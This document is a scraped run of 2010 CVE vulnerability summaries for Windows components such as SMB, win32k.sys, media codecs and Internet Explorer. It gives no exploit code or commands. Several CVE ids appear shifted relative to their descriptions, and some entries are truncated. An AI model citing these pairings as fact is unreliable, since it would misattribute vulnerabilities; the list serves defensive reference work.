Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary 